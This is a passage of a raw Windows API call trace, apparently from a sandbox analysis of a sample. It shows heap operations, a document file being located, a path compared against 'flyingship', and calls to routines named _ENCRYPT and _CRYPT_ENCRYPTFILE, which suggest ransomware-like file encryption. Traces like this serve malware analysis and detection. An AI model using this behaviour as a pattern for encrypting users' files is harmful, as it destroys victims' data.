Size=0x8) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.822] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.823] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0177.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.823] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0177.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.824] CloseHandle (hObject=0x138) returned 1 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.824] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.825] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.825] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.825] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.825] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.825] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.826] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.826] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0177.826] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.826] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.826] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="G856.ots", cAlternateFileName="")) returned 0x90add8 [0177.827] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.828] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="G856.ots", cAlternateFileName="")) returned 0x90add8 [0177.828] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.828] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\G856.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.830] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.830] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.830] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.830] 